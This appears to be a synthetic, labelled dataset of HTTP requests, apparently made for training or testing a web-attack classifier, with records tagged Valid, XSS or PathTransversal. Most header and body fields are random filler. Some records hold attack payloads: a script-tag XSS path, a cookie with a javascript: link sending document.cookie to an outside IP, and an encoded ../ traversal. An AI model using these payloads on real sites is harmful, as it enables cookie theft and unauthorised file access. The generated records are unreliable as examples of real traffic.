UA-CPU: 68000
UA-Disp: 860,981,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5099x0189
Via: ad19m/2.6 www.eatetes0.js, 2.3 www.neooe.shtml
Transfer-Encoding: compress
Upgrade: enej/5.3
Warning: 697 185.37.75.36 "rRncnh" 
X-Forwarded-For: 81.125.98.15
X-Serial-Number: 235537183752
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rhattlRo9wtn=aed1rhnswpolheeeia&mcte=79400&dLdu=867&sT5r4rieief=ndocument>e&Hsasfoed0eht7=7&.l82CKhXR=atpassthrue'&IcwXv2=sfjB&xdItwe9hfor6=662&earnueioeb2vhd3=fptmpbtnsE&Cctya7ubq=%ubinch(7Oeupyingoenj&cf23MWdoo=rpoe&5efOq=snPmW

End - Id: 5927
Start - Id: 4393
class: Valid
PUT /2ziryXm6v@BLa6vfj.Tf/nlahehfe/3c/Iexec.n@UB8cSdXA.gif? HTTP/1.1
Content-Length: 103
Content-Language: h8al8
Content-Encoding: gzip
Content-Location: http://www.rrolc4ei.ch/jhIeaweh/eeceb0/jr7tHo.php4
Content-MD5: N3RveWVzbm5zcmFvaTNlUA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Feb 09 02:10:05 CET
Last-Modified: Wed, 17 Jun 09 11:04:28 UTC
Host: 145.184.45.4:80
Connection: close
Accept: image/*
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.3, identity
Accept-Language: aPthO5-of, ja4O-searmLf;q=0.7, uc-jead;q=0.7, eMrt-inmscus;q=0.3, R3i-neaaV;q=0.4
Cache-Control: no-cache
Client-ip: 82.205.255.139
Cookie: uroraanteiepp=nQ5xwdigEezciu;mtAaaiuS=$hrht
Cookie2: $Version="9"
Date: Wed, 15 Jul 09 22:11:02 GMT
ETag: "xl9oo@78lZOG_g@aFa_"
Expect: B1odt5
From: aetadtfe@elerak5o.uk
If-Modified-Since: Sun, 31 Aug 08 21:27:23 CET
If-Unmodified-Since: Fri, 23 Oct 09 12:39:41 GMT
If-Match: *
If-None-Match: "JAcdqBv733fqsShfz"
If-Range: "So7lBmcfvQ@9yQD"
Max-Forwards: 5
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic aVdpNGxoQTp0NHMwaHNo
Authorization: Basic b3NzMGljOmF0emFp
Range: -090
Referer: http://www.eewyd.de/gpil.tar
TE: trailers,chunked
Trailer: Upgrade
User-Agent: Mozilla/2.5 (Windows; U; Win98 1.9; oe-bn; rv:7.8.8) Gecko/97901791
UA-CPU: Sparc
UA-Disp: 7270,8918,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 811x736
Via: 1.1 www.odeuoea.html, HTTP/5.4 236.148.84.34
Transfer-Encoding: identity
Upgrade: cstua9/7.1, etzay/5.5, Dnexi/0.7, oro/7.7, Uf4e/4.1
Warning: 630 www.ld8md.shtml "Ovhsnhht" "Sat, 16 Sep 06 10:49:57 CET"
X-Forwarded-For: 104.70.137.167
X-Serial-Number: 5443838
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

isqo5nrjqemut= tirmernullSenvlia&2sdu=ixb&eooI=8&eb3m1pGsoClSma=fS2vFLmGy&otsyeixe6aiiF9E=5wl&Nssb=6692

End - Id: 4393
Start - Id: 46537
class: XSS
GET /<script>alert('Vulnerable')</script>.shtml? HTTP/1.1
Host: 215.107.84.226
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: gev-nestop;q=0.8, M6hr7t5-a;q=0.8, 0thhpt-om;q=0.8, ethbinm-uJmz
Cache-Control: max-age=592
Client-ip: 4.189.24.120
Cookie: srnblaIaksxt=1823
Cookie2: $Version="896"
Date: Tue, 16 Feb 10 10:56:06 CET
ETag: W/"TNU3.UCdJYt172X7AQh8"
Expect: 100-continue
From: ns7rogjc@npah.it
If-Modified-Since: Thu, 27 Apr 06 01:13:23 CET
If-Unmodified-Since: Wed, 24 May 06 17:59:03 UTC
If-Match: "9oYjg2GYAoSOmeeT-f"
If-None-Match: "8L9FnjWtU@u@r@3g7l.c"
If-Range: *
Max-Forwards: 637
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM YVNldHQ0aEVhZXduaDNDaWM5ZGdlOWNlU3BwZXBlcmFhcA==
Authorization: nr1ti raeureu=fttsc
Range: 545941-
Referer: http://UZHiag.fr/aruaFjed/ardt/ortRuts/tdsbrnmE/apajnntn.shtml
TE: trailers
Trailer: If-None-Match
User-Agent: rslinraeoplegi8a
UA-CPU: x86
UA-Disp: 884,253,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 139x000
Via: 6.7 59.126.144.8
Transfer-Encoding: gzip
Upgrade: ier7qt/0.9, a9hc/3.6, ins/7.0, tttS5/5.5
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46537
Start - Id: 45183
class: PathTransversal
GET ////? HTTP/1.0
Host: 107.51.44.253
Connection: kyAmieu
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 29.232.237.153
Cookie: teO7mIltat46s=a1pt;wo4=8356503535;Rf1lacceptexecgG=uP6VkU7iZWW;rtEv2law=http=O nr0Qadmintof;cHfcmhspX5=o1duneaitaglc4
Cookie2: $Version="339"
Date: Tue, 26 Feb 08 10:06:46 UTC
ETag: W/"qy__xjWofBRdE1OHoeF"
Expect: 100-continue
From: azaxo6@aowhloiie.net
If-Modified-Since: Wed, 31 Jan 07 19:10:19 GMT
If-Unmodified-Since: Sat, 10 Sep 05 11:25:42 UTC
If-Match: "xgznTSO9INjdkIy1E"
If-None-Match: "P0UMFHi1nMB6-YMc6e1M"
If-Range: Thu, 11 Nov 04 24:00:11 GMT
Max-Forwards: 747
MIME-Version: 5.1
Pragma: he='evhsp'
Proxy-Authorization: Digest uri=/teoadOp/uies/ebnnhteb/ariuiir/caepcrnU.pdf
Authorization: lu1l7 prUsP=IuiT
Range: 551-3881,-846
Referer: /Vatayttx/dumsnCl.pdf
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/5.2 (Windows; U; Win98 2.5; e8-xs; rv:2.4.7) Gecko/09644300
UA-CPU: StrongARM
UA-Disp: 370,8487,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1177x8327
Via: 3.5 152.142.6.173, siqed6/4.1 169.175.109.189
Transfer-Encoding: compress
Upgrade: eimdea/6.6
Warning: 826 www.ta4rtlrX.css "e3eAsf" 
X-Forwarded-For: 254.171.174.88
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45183
Start - Id: 31233
class: Valid
GET /m_cG.sh?1q0iW.W6=r.wmZsnrh0&ZCXC=54&kiGWXinsert=660&hmketsrqw8Lh5kv=6747&tnmbanoot=ltmlocationebi%3B7tusrtto&Eawatsuf8htena=404664&nntahkr9=ixJT&bgsoundnopenhBNg.5=bodysst%7Ewp8ceerroeal&nniionn2=mwosE5iebE&@-dservicesFuexecsfr.mail=291738019&Nduhtr2=openencr&1VftpvGABQ=n9ww HTTP/1.1
Host: www.4sstvsndhi.org
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: windows-1251;q=0.2, big5, utf-7;q=0.8, x-mac-hebrew;q=0.7
Accept-Encoding: gzip;q=0.2, gzip;q=0.3, compress;q=0.6
Accept-Language: olht6fs-EmGzma;q=0.2
Cache-Control: max-age=66
Client-ip: 126.82.213.147
Cookie: bCn6tiL10NV=-mn;htiOepsdoiss=3030828;YDvrC3chO=f'ng;eac=i@ned;Sc=6
Cookie2: $Version="812"
Date: Thu, 20 Oct 05 12:32:42 UTC
ETag: W/"FmiWmSGow2Ubech68d"
Expect: 100-continue
From: DsosoD@ehto0.fr
If-Modified-Since: Sun, 27 Aug 06 06:08:35 CET
If-Unmodified-Since: Tue, 05 Oct 04 10:29:17 GMT
If-Match: *
If-None-Match: "@BFujRif1-0wIq8.avc_"
If-Range: Wed, 11 Apr 07 24:22:00 GMT
Max-Forwards: 62
MIME-Version: 1.4
Pragma: Ir5='f'
Proxy-Authorization: wgwdn huead9ea=bent
Authorization: eD865w hoboicsa=leona
Range: 835058-581
Referer: http://www.nlutei0E.org/mts5.pl
TE: deflate;q=0.7
Trailer: Proxy-Authorization
User-Agent: rdCdyoh (nQNvpDiso1; oOFl3Q)
UA-CPU: StrongARM
UA-Disp: 097,2984,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 139x604
Via: HTTP/9.8 www.tt1e5st4.png:182
Transfer-Encoding: gzip
Upgrade: pLon/6.3, reyuw3/1.4, erHvaa/9.5, c6T2/3.5
Warning: 470 www.PmqSon.tiff "etyxjzn" "Sat, 18 Jul 09 18:15:29 GMT"
X-Forwarded-For: 94.143.84.255
X-Serial-Number: 65900782326
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31233
Start - Id: 12158
class: Valid
GET /p_jmCBpgHtY/agRmQ-g.aspx?Rean=533&aohseFclds7hat1=tUBVtC-FOws&logHKcstyle@=utn7ochIetui&7eaaea3j4N=tEtlyaeccamohetha&tattlWp=E4pir&8db=eeoEoie7eeye7THo&Ietuejztetttn=Oaf%3Aa&ios=6469&neb6acaEn0shG=gndiv%28hl%29clwn&hhcygkiierKicw=ertiilqdif&7paF7TaTsanelo=aLNsdE&vdrop_-aG=e+&wentnsM7l=6 HTTP/1.0
Host: 124.147.170.245
Connection: keep-alive
Accept: */*
Accept-Charset: gb2312;q=0.9
Accept-Encoding: gzip, deflate, identity;q=0.7, gzip;q=0.5, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 21.246.158.137
Cookie: Iecwprehj=tasiatrrrls'trf
Cookie2: $Version="2"
Date: Sun, 26 Dec 04 04:48:22 CET
ETag: W/"cIZHg2QFMujR@-U9Xwx"
Expect: 100-continue
From: 3llueiuh@dwE6ieEe.uk
If-Modified-Since: Mon, 04 Jan 10 17:33:28 GMT
If-Unmodified-Since: Thu, 27 Nov 08 06:46:02 CET
If-Match: *
If-None-Match: "D7Vrpd0z0ZPFdpqC"
If-Range: "eVkG7.EujvlwMIcpgkt"
Max-Forwards: 0
MIME-Version: 1.4
Pragma: craLds4t=snncmueq
Proxy-Authorization: lert mmeei=fdhn
Authorization: Basic ZTJ0MG41ZDo2b3N1
Range: 128893-32127,18-,42-
Referer: http://bek0tb.cz/qomlo/sgwowei/oScpk/alri.png
TE: gzip;q=0.5,trailers
Trailer: Pragma
User-Agent: yzFj7WV_vS http://www.09vaeon.st
UA-CPU: 68000
UA-Disp: 908,936,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 5894x857
Via: 5.4 www.ooOui1ai.jpg:836, 5.9 220.154.71.123
Transfer-Encoding: compress
Upgrade: necoeD/4.9
Warning: 799 56.216.155.145 "xcmStingtiLaa" 
X-Forwarded-For: 215.199.241.153
X-Serial-Number: 99725023233624761
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 12158
Start - Id: 7092
class: Valid
POST /mL/Dwx/jeo/kB6M/_GH9SwL@c6/rGHecgkN5rXJ2.kr/u3a5ewtt/odIzieim/0.so0B/ejrifblaeobybls.pl? HTTP/1.1
Content-Length: 317
Content-Language: e,xslaem,rtcl
Content-Encoding: deflate
Content-Location: http://www.tuuE.cz/spweemri.gz
Content-MD5: ZXN3bWRpZDFib2VibmVmbA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 May 04 24:47:38 CET
Last-Modified: Tue, 14 Apr 09 05:34:26 GMT
Host: 242.69.249.113
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.0, compress;q=0.5, gzip;q=0.3
Accept-Language: ts3g8-fr;q=0.1, tO4-esdsddc;q=0.0, eht-u;q=0.6
Cache-Control: no-store
Client-ip: 252.246.145.208
Cookie: Aei=aDHgROUb;enhoX=105087;ee6ebouJE5asO=3vX;Wd=heiseodB;owotewadtinL=yh$b een/h9]oii)
Cookie2: $Version="672"
Date: Fri, 19 May 06 24:49:48 GMT
ETag: W/"S7fAXx-KnQ-6d7qdiMse"
Expect: 100-continue
From: sneehouu@vual.net
If-Modified-Since: Wed, 14 Jun 06 16:03:26 CET
If-Unmodified-Since: Wed, 06 Jul 05 01:29:27 GMT
If-Match: "sdXpyX7UR6FNzVWsMB"
If-None-Match: *
If-Range: *
Max-Forwards: 979
MIME-Version: 0.4
Pragma: Aext='6l0do'
Proxy-Authorization: Digest nonce
Authorization: Digest opaque="M7zieY"
Range: 3-,222636-,-86989
Referer: http://www.i6n1f.it/Onn8t/gafaenad.zip
TE: trailers,deflate,trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.6 (Machintosh; U; Mac OS X 4.8; to-4w; rv:3.5.6) Gecko/62352648
UA-CPU: x86
UA-Disp: 5151,1845,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 382x2426
Via: 5.0 www.jiEosn.png
Transfer-Encoding: identity
Upgrade: soto/1.7, tbon/1.6, neyvo/0.0, d8xla8/5.4
Warning: 817 144.31.134.157 "syge" "Mon, 18 Jan 10 11:34:49 GMT"
X-Forwarded-For: 60.44.207.26
X-Serial-Number: 317162195276859
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wmetnttopgmilat=3tkor&8iElioek=otaocghesdrsEasn&bgsoundS88=Ooaanstnso&nwfRv=Aex/c&jni=ncSr5wuetcaaccept&raes=eTu'ooaulrA&Icag=>Miw:wt inputlsva@e[' oo&oseckgsaele=7713223&iuVbr=oumG@Grxw&lae8hu=9044&hhdCenaen5catwp=eom&hc1eTjdiNDthy9=e&eBbyju=449610956&pzE6fpassthruMEH=u?thAErmltzs&bgutosaofgT=thEe

End - Id: 7092
Start - Id: 5944
class: Valid
POST /ewimPhyJ_8P9@dW/aRzAtr@_/nfhbleeomueeeo3emfMz/lNbUyATXh9YSwJUANd/hrYmqGy0selectIDtsF/eEpabLm9BJ3/Sslmbm8n3/qtSuHt/mr/er0TcaaMnhleTp.html? HTTP/1.0
Content-Length: 330
Content-Language: 7wIiivpe
Content-Encoding: gzip
Content-Location: /rFecta/tnlwht/HferaeyE/haeusoe.tar.gz
Content-MD5: T2xzcWVsdHJlM2gyYTRhYg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 27 May 04 01:37:51 UTC
Last-Modified: Sun, 15 Jan 06 24:13:44 GMT
Host: www.czuD.uk
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=68283
Client-ip: 182.209.58.87
Cookie: andlS3uopen=hAPg4Nttia8dn;erfgosFbishgr3=2;iraoetef0ana=6ZHxt9_;otlwUEe=irNJmB@;aEemfomsp=hooennullsn;6m=127040
Cookie2: $Version="255"
Date: Mon, 21 Mar 05 04:11:45 UTC
ETag: W/"ZofDx5HpO_bdoX7MkU"
Expect: 100-continue
From: t0hv@Afuotwnusz.uk
If-Modified-Since: Fri, 17 Jun 05 24:16:03 CET
If-Unmodified-Since: Thu, 28 May 09 04:37:31 GMT
If-Match: *
If-None-Match: "6kq21K1wi_c2pklpwy"
If-Range: Mon, 01 Oct 07 16:17:48 UTC
Max-Forwards: 61
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest realm
Range: 50069-26553
Referer: /aeeR/w8rerZMe/elhlo3t/dam6w8.txt
TE: trailers,gzip;q=0.0,trailers
Trailer: Connection
User-Agent: Mozilla/5.0 (Machintosh; U; PPC Mac OS X 2.5; a1-ao; rv:3.4.6) Gecko/66821793
UA-CPU: x86
UA-Disp: 407,032,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 429x2123
Via: 9.1 55.12.207.27, zal/0.4 www.eec3oas.gif, 4.4 244.0.13.213:819
Transfer-Encoding: compress
Upgrade: aeic/3.2
Warning: 725 www.sdsWm.shtml "dsLrjmutignetroi5n" "Wed, 04 Jun 08 20:36:56 UTC"
X-Forwarded-For: 81.125.98.15
X-Serial-Number: 235537183752
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Winw0a5oNkzw=o3te&ndhSesrflebhehe=i1gboot.inin&aypeWlneltqh3fp=pma&mmebcre6dnk=e99q&0sianbh=1c4+xenasusfr3saAinsertk2&hRyuh=tnhelatddt&h0uboJ65scriptq4=69911857&aoeejl6a=@&ue1hu3ideSplaqt=e4hrUibNE&ce3pvQPshutdown=59022724&TYBsC8whereVgaQ=hnciz6hd&ihssagwreaaoeeR=nLEBQWc&oon=t f:esFrmgeuutfc&eevgesopThn1=iw~omtehtacceseo

End - Id: 5944
Start - Id: 9152
class: Valid
GET /ti/rW/dw-ggX/fALenslElshnhu/aEFWe3zlFz-OF2U/L@/mT649o/iDceEm5nHwcsejfr4ote/o-BNEK1/eS00kiLHY1xv/xosYgmSooe.css?weliahAootecr=wnaur&rbdc24p=oAOZ9WPw&lxortm=19&eoeoi=tln&espVpddicrei=zftWga&dvuaupege=%3Et0itan%3Dt&ngbripoorcewT=7753608423&Yc9UUHBq=9shvslnrit%25%40iw&hirEe=jN+S&xhe=54&Ex=037708&cL50fmocha8XlMHk=ptVTnuefAYrcc1ie&asrrntdHtpdti=Otevy%3AilinkatNA%5Di%3Cyru&2XUFvfexec=aE4iwcAZPCoM HTTP/1.1
Host: www.ts6lbnm.gov:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-1251, koi8;q=0.6, big5;q=0.9
Accept-Encoding: 
Accept-Language: qeu-opfo;q=0.4, eSgmtaev-nas;q=0.3, 3ster-oh
Cache-Control: min-fresh=9178
Client-ip: 241.44.89.168
Cookie: _VUyZQopenXv@f=sr2ptrizie9a;nr8SUX8_img=76579;nlyfapayeejY=493;ao9onasduap= $bqh
Cookie2: $Version="2"
Date: Tue, 06 Nov 07 01:27:57 UTC
ETag: W/".ajCxE0M.Oz61Gz2R"
Expect: 100-continue
From: eoykeh@pmat.fr
If-Modified-Since: Sun, 06 Aug 06 01:16:20 UTC
If-Unmodified-Since: Mon, 08 Feb 10 20:11:42 CET
If-Match: "7AQcffIBO1DFWA4Mh.ZP"
If-None-Match: *
If-Range: Sun, 06 Sep 09 14:41:53 GMT
Max-Forwards: 6
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest qop=fe4a
Authorization: NTLM aHBydHRyZHVlZ2UybzdoZXVhb2FvYnY2c3EzZkdkYWJpeG9udnV1Z2lvOWVldWE=
Range: -7586
Referer: http://www.81rs.de/adha.gz
TE: trailers
Trailer: Date
User-Agent: Mozilla/1.5 (Windows; U; WinNT 9.3; 5a-sc; rv:4.5.3) Gecko/19475625
UA-CPU: MIPS
UA-Disp: 104,519,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0794x264
Via: 9.9 244.7.138.141, lsec/5.8 www.ciun.jpeg:1, 3.5 www.eEpeqt.jpg
Transfer-Encoding: compress
Upgrade: mapEt/8.1, RNae/5.1
Warning: 458 www.ut4swaua.html:71 "henawlaet6dg" 
X-Forwarded-For: 189.85.16.83
X-Serial-Number: 688483710117371
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9152
Start - Id: 25833
class: Valid
GET /tiBcD3RUo51rgZ/1xhb/cwoatadomho8th7rt/acceptoB_S/rhze7NT9rREYWvaQT/rD48RGm88v@/z4WTUXQeNGqo3lwl/NepcebwiOhfvahai7tre.png?anNec=tooh%24mgti%26C%40%5Bsesj HTTP/1.0
Host: 45.180.118.175
Connection: close
Accept: image/*;q=0.9, text/plain;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 193.228.192.91
Cookie: ot0kden4n=214;tp=aD;te=a;titcehtcb=gepatua1
Cookie2: $Version="869"
Date: Sat, 12 Nov 05 22:57:08 GMT
ETag: W/"@c1u_iQtSdTkmyi_Cg"
Expect: suty=oolrhog
From: ehrr@sqgr.com
If-Modified-Since: Thu, 15 May 08 18:11:59 UTC
If-Unmodified-Since: Sun, 21 Feb 10 20:35:38 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 472
MIME-Version: 9.6
Pragma: oed='aeLani'
Proxy-Authorization: lpm4t aNaOhes=tssi
Authorization: Digest nonce
Range: 99966-9031,68556-8,-5435
Referer: http://www.oAUtt.gov/qAhNgh.js
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.0 (Machintosh; U; PPC Mac OS X 3.1; xL-sn; rv:3.6.0) Gecko/36231491
UA-CPU: StrongARM
UA-Disp: 3806,956,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 520x0273
Via: 0.3 www.9rz5ei.shtml
Transfer-Encoding: rdnfz; gadt=yoeohern
Upgrade: trtt/3.8
Warning: 958 www.atslai1t.png "nqaa44tlrn0" 
X-Forwarded-For: 99.126.193.7
X-Serial-Number: 5771791492061
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25833
Start - Id: 257
class: Valid
GET /n_.58ZV7WHeGiXDT/lLDpG/r7Wu@/fRIp30JS/6fJW86kiTU9zcyXY1v/OSetMsrnqwet.tiff?aTu1hfp92apezn=hassn&eRr4c=PrEa%3Aitelnet%40script%28nftltys&0evdtwaesdat=22167&CFUs=yEJ&XvoMPC-Wk7=uIicaheanGlAe5Ta&orftohd0n=dtn%26p&cnetdm=o0&uemm1namcenu=33&idp=7566197348&hLfrhulmt=%5BedocumentRtft%24mntda&fey2sMmyttt=e7edeuhhnkheSiorK HTTP/1.1
Host: www.keeorn6atr.be
Connection: senfsev
Accept: image/*;q=0.5
Accept-Charset: iso-8859-15;q=0.5
Accept-Encoding: 
Accept-Language: ws-hd;q=0.5, Sctir-e0s1a;q=0.9, lANlve-vd, A-u
Cache-Control: min-fresh=35
Client-ip: 237.190.39.41
Cookie: hwSjtir=utteQwwpdeaS;SjyMSmv5s=fKS-DH_M_1
Cookie2: $Version="96"
Date: Sun, 03 May 09 14:46:13 UTC
ETag: W/"8ngAg-0J-BQAxHJ"
Expect: tpitsuee=kaEHtmts
From: bfsu@ii7mg.cz
If-Modified-Since: Mon, 27 Oct 08 22:35:58 UTC
If-Unmodified-Since: Tue, 22 Dec 09 15:12:03 GMT
If-Match: "W9Fuoy4ki9uEdROlG0-"
If-None-Match: *
If-Range: Sun, 21 Jun 09 14:46:29 UTC
Max-Forwards: 1
MIME-Version: 9.7
Pragma: b=i
Proxy-Authorization: nnedm sagh=xef1hdc
Authorization: Basic c3d5Z2VhMjpkZW52aQ==
Range: -735916,3400-462,6-4322
Referer: /aRii/4ono.jsp
TE: gzip;q=0.5,trailers
Trailer: Date
User-Agent: Mozilla/5.0 (X11; U; Open BSD i386 0.4; ua-I2; rv:5.2.3) Gecko/83035916
UA-CPU: Sparc
UA-Disp: 223,1661,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4622x2387
Via: 2.4 www.shaer9.jpeg, HTTP/4.3 www.echtsnes.css
Transfer-Encoding: gzip
Upgrade: s0xkh/1.0, aoohr/0.2, neh/8.7, kmSce/3.3
Warning: 778 228.207.156.98 "emdbsg0nhaeda1q" "Thu, 02 Sep 04 15:14:39 UTC"
X-Forwarded-For: 127.92.165.64
X-Serial-Number: 388092866322
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 257
Start - Id: 4645
class: Valid
POST /sg/Jfennt/ididTtirt/s7yswm/AitS/aJGWQL_IolsW3O4ZG5i/zY1j_GN/s2/rg/a0LQoN8lw.js? HTTP/1.1
Content-Length: 187
Content-Language: te,7w9ko,iAt0d
Content-Encoding: compress
Content-Location: /nSggxho/uktqfiEQ/iloesba.php3
Content-MD5: VHN0bWFqZWVpYWRkb2loMA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 18 Jan 06 15:29:56 UTC
Last-Modified: Sun, 25 May 08 08:55:42 CET
Host: www.isBTxeuioI.cz
Connection: mtnney
Accept: */*
Accept-Charset: windows-1251, x-mac-arabic;q=0.4
Accept-Encoding: deflate, compress, gzip, identity
Accept-Language: ueqatd-st4x
Cache-Control: max-stale
Client-ip: 34.184.9.198
Cookie: ins3sm0geJnm=3368221109
Cookie2: $Version="0"
Date: Sun, 17 Apr 05 05:54:33 UTC
ETag: "bsnEdCJyg8Am@@oHjnt"
Expect: 100-continue
From: e8Lt@yeTis8dS8t.st
If-Modified-Since: Mon, 10 Aug 09 09:57:39 UTC
If-Unmodified-Since: Fri, 12 Sep 08 15:00:40 CET
If-Match: "Mwfbbvr4d.Fv2Il"
If-None-Match: *
If-Range: *
Max-Forwards: 1248
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM cmRsYWJ3ZnN0eW55aG1hTXdlZXpyYWYxTmVhdnVqa3Rib2k=
Authorization: Digest username="tiorasTw"
Range: 232-0,-44178
Referer: http://www.rnresst0.it/iniaX/eeue5tr.msf
TE: trailers
Trailer: Via
User-Agent: Mozilla/7.9 (X11; U; Open BSD i586 7.2; et-mb; rv:1.9.9) Gecko/98119586
UA-CPU: 68000
UA-Disp: 984,729,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0964x700
Via: HTTP/9.0 www.hehTiexo.png, FTP/1.0 161.44.0.208, HTTP/1.0 www.auiooje.shtml
Transfer-Encoding: gzip
Upgrade: tmhgq/3.2
Warning: 177 www.e0at.css "cpweb4u4hnat3a" 
X-Forwarded-For: 71.251.211.91
X-Serial-Number: 42430609467360464
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lcto=oln&m.Spog=~from&FPfromHW=eTi&aehtallvs=wcE&ifoulihis=35680&q49tTtaef=1&nullI2kincludeydeleteQZcA=nwnlrtaaf&oe=0Xx&a7teRwtndEe=includeUgo&ijeuerRdrNsaooi=eeatumLfineeoweZ&susiFi=70

End - Id: 4645
Start - Id: 46692
class: XSS
GET /oeentswaariaeujbeisc/xs/9rdrnacgwrelt3woohP.css?gUlg6LEchild6=%3Ctadpe%5C+iVnlinkef+teR&ae6o7eke8=kU.ygY8O-79Q&usrq0.=gie&q2rtgh7tcii=winntnlst&eciyiacfenwtsca=kltepm%25fromeoa&isegM1resb=u2%5ColniarnHogi&friqCa3e=%3D%40uciI&Mvmeeopmdmuoar6=ktRdlhbteDeq5eveT&vkWEHCW=efu&oint1ensS=g4A&He7VEa918eg=nNcao-mi5%40ha5+ HTTP/1.1
Host: www.g1aw7dsy.gov:73551
Connection: TkgCcl
Accept: image/*;q=0.6
Accept-Charset: cp-936;q=0.3
Accept-Encoding: deflate;q=0.7, identity;q=0.3, deflate
Accept-Language: m7e-j;q=0.3, so-ntyotne;q=0.1, sizeg-Ra7iy;q=0.2, aatpUIe-9iqHce, d-rtorCc;q=0.2
Cache-Control: max-stale=9113
Client-ip: 141.164.135.166
Cookie: qoenisee5ep=<link  rel  =   " stylesheet         "  href  =    "   javascript:    [window.open('http://202.126.104.142/nsdeni.jsp'+document.cookie);]     "    >;IANPpj_r=dhe
Cookie2: $Version="9"
Date: Sat, 20 Mar 10 22:46:45 UTC
ETag: "8TTEKt1bugfGuOjxFp1"
Expect: 100-continue
From: ewaeiu@9Hea3Eeae.cz
If-Modified-Since: Mon, 19 Apr 04 13:01:50 UTC
If-Unmodified-Since: Sat, 02 Aug 08 18:39:53 GMT
If-Match: *
If-None-Match: "D@jZU9zNHdI@1UXDWs_"
If-Range: Mon, 07 Feb 05 20:58:56 GMT
Max-Forwards: 7506
Pragma: no-cache
Proxy-Authorization: eu9g reaurh=an5mRwhe
Authorization: Basic VW5Jc2FpaGE6c3RudzZuaGY=
Range: -441983,369-,-36125
Referer: /awreg9/mfk6je/5sriOtgo/lgnw7i.zip
TE: trailers,trailers,chunked;q=0.1
User-Agent: Mozilla/9.7 (X11; U; Linux i386 2.0; re-ht; rv:4.5.6) Gecko/47472231
UA-Color: color32
UA-Pixels: 856x716
Via: 8.0 www.ntayneC.png, deNt/2.8 www.ni3ig8.jpg, 3.8 www.atzIaq2.css
Transfer-Encoding: identity
Warning: 432 www.ioshmqlo.shtml:38 "eudeotsdatslisd" 
X-Forwarded-For: 7.125.26.87
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46692
Start - Id: 44967
class: PathTransversal
GET /t6ieeoi/xntyooe/4bSHlF/phpGD9Iq7.d6Q/Y46E-/hZVa@6T8RB2Oljrvsdvs/l4/npllclu30n/0osioxoceq3/1paieoloyI8yi.pl?7acirlilst=rls8l96s&nuAxoaaq=processing-instructionjrcenyosstv7&lnsCidteh=sytwq5&etmwu74l4n=87057&dea=rgistYrDyr&aueroou4de6hoem=imRa53ohafc0euln&QCbgsoundyKlikeOcmd=%2F.%2F..%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F..%2F&uskar4Asor=t&X9pAs8vr3D=me-zd%3Ayn+chdpo6&riteke6awrsAydm=3&emsvjenE3U=48&ieeinete2y=nsmtecfItay7t&PlsyYD.pxterm=ns HTTP/1.1
Host: 80.23.99.181
Connection: close
Accept: */*
